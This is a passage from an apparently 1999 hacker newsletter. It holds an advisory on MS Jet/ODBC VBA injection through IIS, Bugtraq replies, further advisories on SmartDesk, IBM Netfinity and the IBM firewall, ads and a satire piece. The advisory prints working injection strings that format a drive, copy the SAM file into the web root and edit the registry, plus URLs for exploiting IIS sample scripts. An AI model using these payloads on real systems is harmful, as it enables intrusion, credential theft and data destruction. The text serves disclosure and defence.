bar characters in the string, like this: select 'lil'' string | 6+7 | with number' as foo from table; This will produce a recordset containing one field with the value "lil' string 13 with number" for each row of the input table. Innocent enough, if the CGI or ASP programs correctly quote the incoming data. However, since the pipe operator is a rather obscure character and is very poorly documented, most people don't know it's there - apparently even Microsoft programmers. --[ It's a feature, not a bug! Note the following excerpt from a MS Knowledge Base article: (http://support.microsoft.com/support/kb/articles/q147/6/87.asp) Pipe Character or Vertical Bar The pipe character or vertical bar is a reserved character for the Jet database engine. It tells the Jet database engine to evaluate the identifier before evaluating the rest of the expression. Therefore, the Jet database engine inserts the value of the identifier in the expression, and then evaluates it. Vertical bars are used most often in domain aggregate functions when you want the function to automatically recalculate the value it returns in filters. Or vertical bars are used as an alternative to the ampersand (&) operator when you concatenate text values. Because of this, you cannot embed the vertical bar (|) in a literal string, you must embed the Chr() function. Chr(124) is the vertical bar. --[ Where does it apply? Any textual data included in a Jet SQL query can contain quoted VBA, whether it is in data to be inserted in a new record or part of a condition expression. This makes the hole very general (or flexible, if you prefer), since you don't need to know the context in which the string will be evaluated. --[ What commands are available? The biggest restriction is that the code must be evaluated in an expression context - no statements. Anything listed as "VBA" in the "Functions Reference" page of the Access Help file will work, although this seems to vary between versions of the Jet engine - for example, in some cases the "eval" function works and in others it doesn't (although when it is available, eval doesn't actually help much because the |...| operator offers a similar if not identical context). The most useful command is "shell", although this in itself cannot do redirections or pipes - cmd.exe can assist with this though. By using the shell function and running cmd.exe, an attacker can run any command on the system. environ() can also be useful to get environment variables values into your commands, and chr() can be very handy for quoting awkward characters using alphanumerics and brackets. There are also the standard functions like iif() and various string operations (use "&" for concatenation). It would be very difficult to include any kind of loop in the VBA fragment because loops do not have return values. --[ Which characters need quoting, and how? If the exploit string will be passing through anything that tries to escape special characters then ' will be double up - best to use " instead. Ironically, the vertical bar character can only be escaped by using it to evaluate the chr(124) function. VBA will take pairs of double-quotes (") in a VBA string constant the same way SQL will take pairs of single-quotes. If this doesn't seem to work you can always use chr(34). ASP also provides a convenient debugging aid - if the expression cannot be correctly evaluated the error message will often include the whole SQL query with the partially decoded exploit string in it--this could help an attacker 'tweak' the exploit string until it works. If the command needs to be broken up with newlines, they can be inserted between VBA operators inside the |...| construction. --[ How about a practical example? An example of a pipeline: |shell("cmd /c echo " & chr(124) & " format a:")| will format whatever is in the floppy drive at the time. Any errors will be silently ignored, although an iconised window will take the focus for the duration of the command. Using "cmd /c" allows the command piping necessary to get a newline into the format command, otherwise the pipe and 'format' are passed as arguments to 'echo'. This string can be included in anything from a simple ODBC operation to a text item in an ASP form on a web page. The function will normally evaluate to a two or three digit number. A more sophie's-stick-ate-it example involves grabbing a copy of the SAM: |shell("cmd /c rdisk /S-")| |shell("cmd /c copy c:\winnt\repair\sam._ c:\inetput\wwwroot")| ** this example includes assumptions about the location of the ** system and www publishing directory; it's only an example Commands can be stacked: |shell("cmd /c echo 1 > %temp%\foo.txt") & shell("cmd /c echo 2 \ >> %temp%\foo.txt") & shell("cmd /c echo 3 >> %temp%\foo.txt")| ** line broken for clarity It is not clear that the commands will always be executed in order. Each shell command executes asynchronously so the code above has two races for whether the shell commands finish updating the file before the next one starts - results will be variable. --[ Could an attacker modify registry keys? Ultimately the hole allows anything since you can up/download and run any code, but modifying registry keys from VBA seems to be a little tricky. The method using advapi32.dll won't work because it requires statements to declare functions from the library, but there doesn't seem to be a way of giving a statement a return value in VBA. It would be easier to create a temporary .reg file and then merge it with "cmd /c regedit /s %temp%\tmp.reg"; the '/s' is important, as it suppresses the informational dialogs/windows. --[ What permissions will an attacker have? The dangerous part comes from a context misinterpretation with IIS. IIS runs as system_local; it changes its token context (typically to IUSR_xxx) for filesystem access and application execution. However, the context does *NOT* change when interfacing with the ODBC API. Therefore all ODBC functions (and the associated database calls) are happening under system_local. This allows full access to the system. --[ Theory of exploitation This problem can be used over the web against scripts that make queries against local MS Jet ODBC DSNs, therefore, any script or application that uses a MS Jet ODBC DSN could potentially be exploited. The solution is to not use MS Jet ODBC drivers for any DSN--until Microsoft releases a fix. But since this is a documented feature, there stands a chance that some applications may break if removed. --[ Reality of exploitation Ok, so let's get down to some nitty-gritty, real-life examples. We'll give a few that just demonstrate the problem....but since any script/application that gives user entered strings to the MS Jet ODBC DSN are vulnerable, we're not going to laundry-list them; rather, we'll show some of the more common cases we found. --[ Importance of the DSN Just some really quick background on ODBC & DSNs: an application 'connects' to the ODBC service specifying a specific DSN to query to. The DSNs are defined in the ODBC32 applet of the control panel. Each DSN is basically a description of the name of the DSN, the drivers to use (in our case, the MS Jet/Access drivers), and location of the actual database (a .mdb file somewhere in the filesystem). We could also have DSNs that used drivers such as Oracle or MS Sql, and the location would be another server. The whole point is that you only need to know the DSN name--ODBC will take care of where and how the actual database is to be used. So, great, these scripts query a DSN by name. Well, there are times were a server can have the scripts we mention, but when ran, you get an error saying DSN is not found. So now what? Well, if it's an IIS server, check for the existance of /scripts/tools/newdsn.exe. Yes, IIS includes CGI appliations *to make DSNs*. If the server doesn't have the DSN we need, we can just make it for them. We only need newdsn.exe, but it's possible to use a 'GUI' through getdrvrs.exe and dsnform.exe. Here's a flowchart: http://server/scripts/tools/getdrvrs.exe -> pick Microsoft Access Driver (*.mdb) -> Enter in the correct DSN name -> Enter a location for the .mdb, example: c:\web.mdb -> Submit This will create the DSN. If you want to be ultra-elite and do it the hard way, you can pass all the parameters to newdsn.exe like so: http://server/scripts/tools/newdsn.exe?driver=Microsoft%2B Access%2BDriver%2B%28*.mdb%29&dsn=DSN_name&dbq=c:\web.mdb& newdb=CREATE_DB&attr= **all one line, no spaces Where dsn is the name you want, and dbq is the file location. So for all the examples, we'll include the DSN name, just in case you have to create it. --[ IIS Sample Applications According to Russ Cooper of NTBugtraq, sample application problems are stupid and we shouldn't waste our time talking about them. He's already denied posts from myself, David Litchfield, and others. So, if you lived in Russ's little world, you won't have any of the following sample apps installed on your server, so you should just stop reading this article right now. But for those of you who realize it's just not that simple, perhaps you can learn something here. Also note this goes beyond sample scripts--they're just being used as a command reference example. Anyways, a good example script is http://server/scripts/samples/details.idc?Fname=&Lname= stick your shellcode in for either Fname or Lname, like so: details.idc?Fname=hi&Lname=|shell("cmd+/c+dir")| This uses DSN named "Web SQL" (notice the space). However, this causes problems, because the actual table must be initialized in the DSN. Never pheer, scripts are here! Run http://server/scripts/samples/ctguestb.idc after you create the DSN (if you had to) and before you run details.idc --[ MSADC (IIS 4.0) Starting with IIS 4.0, Microsoft bundled a way to do remote SQL queries on a DSN simply by interfacting via HTTP to a specific .dll. Bug? Hole? Nope, in the documentation Microsoft states that having MSADC installed could lead to security problems. The particular .dll is at http://server/msadc/msadcs.dll Now the particular problem is that there's a slightly custom way to interface to the .dll, using multipart-forms. So it's beyond the scope of just typing in a paramter by hand. So there's two options. One is to see if the server also has the (optional) interface installed. Check out for the existance of http://server/msadc/samples/adctest.asp ** Note: you have to use Internet Explorer 4.0+ for this This will give you a Java/Javascript interface that allows you to specify the DSN, uid/password, and SQL string to execute. Note that you'll have to obtain the table structure for the DSNs mentioned herein, because you'll need to construct a valid SQL statement. The other option is to obtain those files yourself from another server, or download and install the MS RDS/ADO/ADC components. Look at http://www.microsoft.com/data/ado/ for more info and where to download. ** One note is that the Java interface lets you specify which server to use. So you can open the interface locally, off your own server, or find it on server 1, and specify to run SQL commands against whatever DSN on server 2. The one caveat is that error information is not displayed. It helps to have a sniffer going to see if what ODBC error messages are returned, if any. If you don't get a record listing, you might want to see what the error was. Now, what to do? You can obviously just execute SQL commands that contain the pipe character. For instance: Connection: DSN=AdvWorks Query: Select * from Products where ProductType='|shell("")|' ** Insert your shellcode in the shell() function --[ Sign-Off Well, I'm sure that's enough to chew for a bit. Sorry, the examples weren't as in-depth as usual--you'll just have to be satisfied with theory. :) Matthew Astley [RCPS] http://www.fruitcake.demon.co.uk .rain.forest.puppy. [WireTrip] rfp@wiretrip.net .many thanks to Matthew for working on this project together. :> .greetings to (#!)ADM, (#)Rhino9, and Phrack .special thanks to joewee & antilove for giving me a hard time; stran9er .for all the fun chats and setting me straight; and everyone else I forgot .before these greets become longer than the advisory. :) Oh, and el8.org rox. --[ This advisory is ISO 31337 certified. Fact of life: ADM > * ---------------------------------------------------------------------------------- Date: Tue, 25 May 1999 22:00:42 +0100 From: Vittal Aithal To: BUGTRAQ@netspace.org Subject: Re: Advisory: NT ODBC Remote Compromise [ The following text is in the "iso-8859-1" character set. ] [ Your display is set for the "US-ASCII" character set. ] [ Some characters may be displayed incorrectly. ] Here's some javascript stuff that'll clean up quotes and things before having them sent off in a sql query... only tested with access, so YMMV. function cleanSql (str) { var newStr = ""; str = "" + str; var oneChar = (str.length == 1); if (str.length == 0) { return "null"; } for (var i = 0; i < str.length; i++) { var repStr = ""; if (str.charAt(i) == "'") { newStr += "''"; } else if (str.charAt(i) == "|") { repStr = 124; } else if (str.charAt(i) == "\"") { repStr = 34; } else { newStr += str.charAt(i); } if (repStr) { if (i == 0 && !oneChar) { newStr += "CHR(" + repStr + ") &'"; } else if (i == str.length - 1 && !oneChar) { newStr += "' & CHR(" + repStr + ")"; } else if (!oneChar) { newStr += "' & CHR(" + repStr + ") & '"; } else { newStr += "CHR(" + repStr + ")"; } } if (!repStr && i == 0) { newStr = "'" + newStr; } if (!repStr && i == str.length - 1) { newStr += "'"; } } return newStr; } not elegant, but it does work, and stop |'s getting through. bye vittal -- Vittal Aithal Revolution Ltd ---------------------------------------------------------------------------------- Date: Tue, 25 May 1999 14:43:25 -0700 From: Bigby Findrake To: BUGTRAQ@netspace.org Subject: Re: Advisory: NT ODBC Remote Compromise On Tue, 25 May 1999, Vittal Aithal wrote: > Here's some javascript stuff that'll clean up quotes and things before > having them sent off in a sql query... only tested with access, so YMMV. Do keep in mind that while this will stop people from using the aforementioned exploits *only when using your forms*. It is still possible to download your web pages, remove the javascript hooks, and then submit their information, or call the CGI(if method GET is accepted) by hand and get around such security measures. ---------------------------------------------------------------------------------- Date: Wed, 26 May 1999 09:01:26 +0100 From: Vittal Aithal To: BUGTRAQ@netspace.org Subject: Re: Advisory: NT ODBC Remote Compromise Just to clarify my earlier posting; The code I posted was server-side ASP Javascript. As a number of people have/will point out, running it at the client isn't going to help. I suspect the same methodology could be applied for other environments (coldfusion / perl DBI::DBD / php / etc). cheers vittal ---------------------------------------------------------------------------------- Date: Wed, 26 May 1999 18:56:05 +0200 From: Bronek Kozicki To: BUGTRAQ@netspace.org Subject: Re: Advisory: NT ODBC Remote Compromise Hello I have run some testing. Seems to me that this error has been repaired in MSJET40, but exists in MSJET35. Effectively, if Jet 4 is installed (and it's used by ODBC) ther's no problem with .IDC files. If one does not have Jet 4 and is using .IDC to open Jet databases (I have not verified this) I belive this is dangerous situation, described by Matthew Astley. Because MS Access 97 is using Jet 3.5 (even if Jet 4 is installed), the problem still can be seen there. If instead of .IDC (which is considered obsolete) one is using .ASP + ADODB, and ADODB provider used is "Microsoft.Jet.OLEDB.3.51" (i.e. older than "4.0") then problem still exists. It's worthy to notice that SQL implementation used in both Jet 4 and Jet 3.5 is little different. Thus applications (in some situations) cannot be simple ported from one to another. One thing I found is different handling of single- and double-qoute character. MS still have not documented differences (or I had no luck to find it). AFAIK MS Jet 4 comes with Microsoft Data Access 2.1 (MSDAC21). Details: System: WinNT Wrkst 4 US, SP5 , IE5 , IIS 4 (Option Pack), ODBC MS Access Driver 4.00.3513.00, other (cursor library, administrator etc.) ODBC files 3.510.3711.0 Database: Access 97, Jet 3.51.2026.0 (I have also Jet 4.00.2115.25 installed, but Access 97 uses older version) Table "guests" as described in Web SQL. Query "SecurityTest" as bellow: SELECT FirstName, LastName FROM Guests WHERE LastName = '|Shell("notepad.exe",1)|'; What happens: - If I open the query under MS Access, it opens Notepad app and shows the (empty) resultset. So far mentioned SQL "feature" works. - If I use MSQRY32.EXE to open the database (), nothing more happen than showing the resultset (empty one). The same if I run SQRY32 from within MS Excel ("Get Externala Data") - I created TEST.IDC file as bellow (and TEST.HTX, of course): Datasource: Web SQL Username: sa Template: details.htx SQLStatement: +SELECT FirstName, LastName +FROM SecurityTest and opened it through HTTP. The only result is an empty resultset. I checked list of processes (using TLIST.EXE) and notepad was not run. - I created TEST2.IDC file as bellow: Datasource: Web SQL Username: sa Template: details.htx SQLStatement: +SELECT FirstName, LastName +FROM Guests +WHERE LastName <> '|Shell("notepad.exe",1)|' the same. Notepad did not run. - I created very simple .ASP <% Param = Request.QueryString("Param") Data = Request.QueryString("Data") %> <% Set Conn1 = CreateObject("ADODB.Connection") 'strConn = "Provider=Microsoft.Jet.OLEDB.3.51;Data Source=c:\temp\test.mdb;Mode=Read" strConn = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=c:\temp\test.mdb;Mode=Read" strSQL = "SELECT FirstName , LastName FROM SecurityTest" Conn1.Open strConn Set RSet1 = Conn1.Execute(strSQL) RSet1.Close Conn1.Close %> Notice that there are 2 connection strings, one is used and the other commented out. Upper connection string ("Provider=Microsoft.Jet.OLEDB.3.51") is UNSAFE. When I opened .ASP it started NOTEPAD.EXE in the context of WWW server. If WWW client can type-in any literal into HTML form, pass it to .ASP application (for exaple to be used in "WHERE" clause) and it remains non-parsed, then he/she will be able to run ANY code in the context of LocalSystem. If such a WWW server is also domain controller ... well, I'm bit scared to think about. Lower connection string ("Provider=Microsoft.Jet.OLEDB.4.0") seems to be safe. I hope somebody can verify my tests. Most important point is that while .IDC files are using current ODBC it strongly depends on configuration of the system. If Jet 4 is installed and is used by ODBC, we are safe. The same applies to .ASP + ODBC. On the other side is .ASP + ADODB, where Jet engine can be explicitly selected. If Jet older than 4 is used then we have dangerous situation. Fortunately in .ASP we can easily parse strings passed >from WWW client (like Vittal Aithal did in JavaScript, but function will be run on the server side). Regards. Bronek Kozicki -------------------------------------------------- ICQ UID: 25404796 PGP KeyID: 0x4A30FA9A 07EE 10E6 978C 6B33 5208 094E BD61 9067 4A30 FA9A : -----Original Message----- : From: Bugtraq List [mailto:BUGTRAQ@NETSPACE.ORG] : Sent: Tuesday, May 25, 1999 9:00 PM : To: BUGTRAQ@NETSPACE.ORG : Subject: Advisory: NT ODBC Remote Compromise : : : --[ Advisory: NT ODBC Remote Compromise : : --[ By Matthew Astley [RCPS] http://www.fruitcake.demon.co.uk : --[ & Rain Forest Puppy [WireTrip] rfp@wiretrip.net : : --[ Brief Summary : : MS Jet database engine (which runs Access databases) allows an individual : to embed VBA in string expressions, which may allow the individual to run : commandline NT commands. This, combined with the flaw of IIS running ODBC : commands as system_local allow a remote attacker to have full control of : the system. Other webservers may be affected. Many MS Jet engines are : affected, but may not lead to elevated priviledges. Here's something that does not work for me. ODBC is not using Jet "feature" run embed VBA expression. It seems to use different database engine. : --[ Background : : ODBC allows a program flexible access to one or more relational databases : using SQL. If a client fails to quote correctly the meta characters in a : piece of data used in an SQL query, an attacker may be able to interfere : with the tables in the database (see MS SQL appension 'feature' in Phrack : 54, article 8). That's true, but not connected to the subject. Attacker seems not to use Jet, while "feature" exists just there. At least on my system. : However, the Microsoft "Jet" database engine (aka MS Access) provides some : extensions to SQL which allow the execution of VBA (Visual Basic for : Applications). This makes holes in meta character quoting code much more : interesting and dangerous. That's true. [cut] ---------------------------------------------------------------------------------- Date: Thu, 27 May 1999 15:48:48 -0400 From: Russ To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: Advisory: NT ODBC Remote Compromise I've had 2 individuals suggest that MDAC 2.1 solves the problems described by rfp@wiretrip.net regarding NT ODBC and Access. There is also another message on Bugtraq suggesting the same thing. Daryl Banttari [daryl@windsorcs.com] reports that Allaire's ColdFusion product is vulnerable to the same attack when using Access datasources, but appears not to be vulnerable after installing MDAC 2.1. I could put a direct link here to MDAC 2.1, but the fact is that you should not simply upgrade to it without understanding what it changes (and what effect those changes may have on your existing environment). So instead, I give you; http://www.microsoft.com/data/MDAC21info/MDAC21GAmanifest.htm which has a ton of information about the MDAC 2.1 release. Cheers, Russ - NTBugtraq Editor ---------------------------------------------------------------------------------- Date: Thu, 27 May 1999 17:20:45 -0500 From: Jesper M. Johansson To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: Advisory: NT ODBC Remote Compromise >I could put a direct link here to MDAC 2.1, but the fact is that you >should not simply upgrade to it without understanding what it changes >(and what effect those changes may have on your existing environment). >So instead, I give you; > >http://www.microsoft.com/data/MDAC21info/MDAC21GAmanifest.htm If you are using Excel data sources and are updating data in them you will want to keep in mind that upgrading to MDAC 2.1 will break those data sources. MDAC 2.1 no longer supports the update method for Excel data sources. This will, for example, cause Cold Fusion to access violate, and often causes crashes in InetSrv.exe if you are using IIS. Unfortunately, MS forgot to mention that in the document Russ pointed to. Jesper Jesper.M.Johansson-1@umn.edu Ph.D. Candidate, University of Minnesota Editor, SANS NT Digest MCSE , MCP + I http://ids.csom.umn.edu/jesper "Juris Praecepta sunt haec: honeste vivere, alterum non laedere, suum cuique tribuere" Ulpian @HWA 53.0 Advisory: Buffer overflow in SmartDesk WebSuite v2.1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Advisory: Buffer overflow in SmartDesk WebSuite v2.1 Platforms Affected: Windows NT, Windows 98 Found by: cmart (cmart@staticusers.net) Date: 5/23/99 Description: ----------- WebSuite v2.1 will crash when an additional 250+ characters is appended after the sites URL on NT Server 4 and NT Workstation 4 boxes. Running on top of Windows 98 it will crash with 150+ characters appended after the sites URL. After reinstallating on both platforms several times, the overflow string length varied. Approximately 1 out of 8 times the overflow string went from 150 chars (Win98) to about 1000+ chars. It also went from 250+ chars (NT) to about 2000+ chars. After the server crashes on NT Workstation 4, it's unable to find the lib file sysclass.flb. (On our tests). Details: ------- [Windows NT] http://hostname/00000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000 SDWEBSRV.EXE crashes. [Windows 98] http://hostname/00000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000 SDWEBSRV.EXE crashes. ----------------------------- cmart | cmart@staticusers.net http://winntsec.com ----------------------------- @HWA 54.0 Security Leak with IBM Netfinity Remote Control Software ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 25 May 1999 13:05:56 -0400 From: Russ To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Security Leak with IBM Netfinity Remote Control Software On May 10th, 1999, Thomas Krug reported to NTBugtraq; >Hi, > >I found a method to run programs like regedit and user manager with >admin right using the above tool. The following testscenario has >been used: > >PC with Windows NT Workstation in a Domain >Registry has been secured (especially HKLM) >The User has no local admin rights and is in no admin group. >The execution of regedit and regedt32 has been forbidden by system >policy. > >When running the Netfinity Client and starting the process manager >(view, close and execute processes) and run for instance >regedit.exe or musrmgr.exe the programs run under the user >configured with the netfinity service, either the system account >or an admin. > >Thomas After an incredibly difficult journey through the labyrinth of IBM's support groups, I finally spoke to a Ted McDaniels who, reportedly, was responsible for support of the IBM Netfinity RCS. After explaining Tom's issues with the product, Ted acknowledged that IBM Netfinity RCS was "built with very little security in mind". He also expressed doubt that any "fix" might be made to it to give it even the most rudimentary NT security understandings. IBM did promise to send some sort of explanation to NTBugtraq regarding Thomas' findings, however, Ted has now gone on vacation and we're left with nothing from them. Can you detect how disappointed I am with IBM's reaction and handling of this issue? Thomas' company was in the process of ripping out IBM Netfinity RCS when he originally submitted the issue, and all indications are that anyone using IBM Netfinity RCS, or considering using it, should do the same. Bottom line, there is no way to control what a user can or cannot do with the "Process Manager" component of IBM Netfinity RCS, and clearly they are able to usurp all other controls you might have placed on your NT environment should the product be present. The service *must* be run as either SYSTEM or ADMINISTRATOR. If anyone has found a way to avoid the *HUGE SECURITY HOLE* this product creates in an NT environment, please let us know. Cheers, Russ - NTBugtraq Editor @HWA 55.0 IBM eNetwork Firewall for AIX ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 25 May 1999 20:33:53 +0100 From: Paul Cammidge To: BUGTRAQ@netspace.org Subject: IBM eNetwork Firewall for AIX The IBM eNetwork Firewall for AIX contains some poorly written scripts, which create temporary files in /tmp without making any attempt to validate the existance of the file. This allows any user with shell access to such a firewall to corrupt or possibly modify system files by creating links, pipes, etc with the same name. In a simple example submitted to IBM, /etc/passwd was overwritten. This example has been published on one of their support web pages as a 'local fix'. The problem was reported to IBM early in January. To the best of my knowledge, the correct procedures have been followed. Initially, IBM responded by telling me that it was common practice for software to make use of /tmp. They suggested changing the permissions to prevent users >from creating symbolic links to sensitive files. An APAR (IR39562) was opened on 18/01/99 and closed on 13/03/99. The fix has not yet been released. This definately applies to version 3.2, and probably others. Anyone running this software and has users with shell accounts should be aware that the potential exists for these users to corrupt files which they dont have access to. cheers paul -------------------------------------------------------------------------- Date: Sat, 29 May 1999 00:29:25 +0200 From: Marc Heuse To: BUGTRAQ@netspace.org Subject: Re: IBM eNetwork Firewall for AIX Hi Paul, > The IBM eNetwork Firewall for AIX contains some poorly written scripts, > which create temporary files in /tmp without making any attempt to > validate the existance of the file. This allows any user with shell > access to such a firewall to corrupt or possibly modify system files by > creating links, pipes, etc with the same name. your are right, all their scripts have got link vulnerabilities ... > The problem was reported to IBM early in January. To the best of my > knowledge, the correct procedures have been followed. Initially, IBM > responded by telling me that it was common practice for software to make > use of /tmp. They suggested changing the permissions to prevent users > from creating symbolic links to sensitive files. when I found these in an audit at a customer in february, I opened an APAR too, but then discovered yours. When I saw that yours was opened a month before mine and not being dealt with, I made noise at IBM management and the AIX Security Team, that they issued an emergency fix. But this fix only available for those who know that it exists - anyway, the quick fix still has /tmp races all over the place - they just added "rm -f file" the line before writing into it .... > An APAR (IR39562) was opened on 18/01/99 and closed on 13/03/99. The > fix has not yet been released. This definately applies to version 3.2, > and probably others. I heard that the next IBM Firewall version will fix this ... bah - maybe with that quick "fix" ... But to set one thing straight: It's *not* IBM's fault. The IBM Firewall is a product of another company called Raleigh (I hope thats spelled correctly). In fact, the IBM AIX Security Team, especially Troy Bollinger, was very helpful and getting a fix - a correct one - out. It's the other company who writes security software but really seems to have no knowledge. sad but true Greets, Marc -- Marc Heuse, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg E@mail: marc@suse.de Function: Security Support & Auditing "lynx -source http://www.suse.de/~marc/marc.pgp | pgp -fka" Key fingerprint = B5 07 B6 4E 9C EF 27 EE 16 D9 70 D4 87 B5 63 6C @HWA AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * *****************************************************************************
Come.to/Canc0n99 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:j http:/ 99 http:o http:/ login: sysadmin n99 httpi /come. password: tp://comn to/Can me.to/Cat c0n99 SYSTEM NEWS: Canc0n99 is looking for more speakers and Canc0n99h http:/ industry people to attend with booths and talks. 99 http:e /come. you could have a booth and presentation for the cost of p://comel http:/ little more than a doorprize (tba) contact us at our main n99http:i http:/ address for info hwa@press.usmc.net, also join the mailing n99http:s http:/ for updates. This is the first Canadian event of its type invalid t 403 Fo and will have both white and black hat attendees, come out logged! ! 404 Fi and shake hands with the other side... *g* mainly have some IP locked ome.to fun and maybe do some networking (both kinds). see ya there! hostname http:/ x99http:x o/Canc x.to/Canx http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:x o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 Canc0n99 Canc0n99 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$ ! ! $ $ ! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** ! $ $ ! ! $$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$ www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............. -----------------------------/----------------------------- http://www.segfault.org/story.phtml?mode=2&id=36faccb8-03739440 NATO authorizes airstrikes on hackers Silicon Valley, California -- Chat rooms were unusually deserted, spammers went on panicked last-minute mail-bombing sprees and bomb shelters filled to overflowing today as gloom engulfed hackers waiting for NATO strikes. Hackers showed a mix of fear and defiance toward the Western military alliance, aware it could strike at any moment against strategic hacker targets after yet another embarrassing vandalism of a U.S. Department of Defense website. "This waiting for strikes is killing me," said w4r3z_f14r3, a 22-year-old student in the controversial Computer Science department at the Massachusetts Institute of Technology. "If they want to bomb us, they should do it now so I can get back to cracking Afterlife II." Graphics illegally uploaded to an Associated Press website accompanied a note which stated, "F1n1$h 7h1Z 60mb1n9 0r f4c3 my uur47h, I 4m l337!!! H4x0rs un173!" The web server was quickly downed in a flurry of flamewars over the proper use of the word 'hacker' versus 'cracker' in the page. Many college-age hackers stayed home rather than attending school, though most admit they would have stayed home anyway. Y2K websites issued detailed FAQs to threatened hackers in case of bombing, including information on how long canned goods stay fresh in underground shelters, how to fix a misfiring diesel generator, and how to sow grain in the field with a plow and oxen. Bomb shelters, unused in emergency since DefCon 4, were cleaned up during the last NATO threat in August, when the alliance previously announced its intention to launch airstrikes at the notorious hacker group Cult of the Dead Cow. Most shelters have been turned into underground bunkers featuring ISDN lines with triple-redundancy backups, as once the hackers moved in, they found the absence of sunlight and social involvement enjoyable. Despite the danger, supporters of hard-line hackers were defiant. "NATOns will fire their missiles from a distance," said Lord Kreel, an NT cracker. "Meanwhile, I will be cracking into the Pentagon with my friends in the Lackeys of Terror. We plan to install Windows on all of their computers, which will cripple their systems beyond repair." Opponents of "black hat" hacking think NATO strikes will actually increase the popularity of cracking among the techno-elite, but cement the popular image of the hacker as a no-good techie pirate bent on stealing credit card numbers and eating babies. "Now, [crackers will] attack all the media sites, plastering the entire web with links to porno and warez sites, and lag the whole net to hell", said hacker Frodo Majere. "If NATO thinks they will bend hackers with bombs, they are dead wrong." Supporters of the infamous jailed hacker Kevin Mitnick have reportedly been preparing to strike at well-known pro-NATO companies and military organizations as soon as the first NATO bomb lands on hacker territory. "We'll introduce Y2K bugs to systems where you'll never find them. We will end the disgusting greed-infested system of monopolist capitalism by freeing information forever. Linux is the One, True God," said one hacker, before he was shot and killed by an enraged fanatic wearing a red "GNU NOT Linux" headband, symbol of the underground terrorist organization FSF. A press release issued by the FSF's guerilla leader, known only as RMS, claimed responsibility for the killing. NATO's secretary-general Javler Selena authorized airstrikes against known hacker sites on Tuesday, after hackers on the IRC channel #2600 rebuffed a last-ditch peace offer and gave out free root accounts on the whitehouse.gov server. "In the past, computer security was a war of escalation between system administrators and joy-riding hackers," said a spokesperson for the anti-hacker group Freedom Through Oppression. "It's high time we brought the war to the instigators and bombed these hacker scum back to the Stone Age. To make the Internet safe for everyone, we must squash dissension once and for all. Countries have been nuked for less." "If you don't stand up to the theft of intellectual property of innocent companies such as SysMicrosoft and AppMicrosoft, you threaten American competitiveness and the ability to innovate," said President Gates, as he sought -- and got -- support from congressional leaders for military action. "We must halt the hackers and save the Internet for our children and the future of our country. The dirty, despicable hackers will no longer disrupt websites to make fun of our institutions, or pollute the Information Superhighway with filthy swear words," said former Vice President Al Gore, founder of the Internet, before he suddenly toppled over and 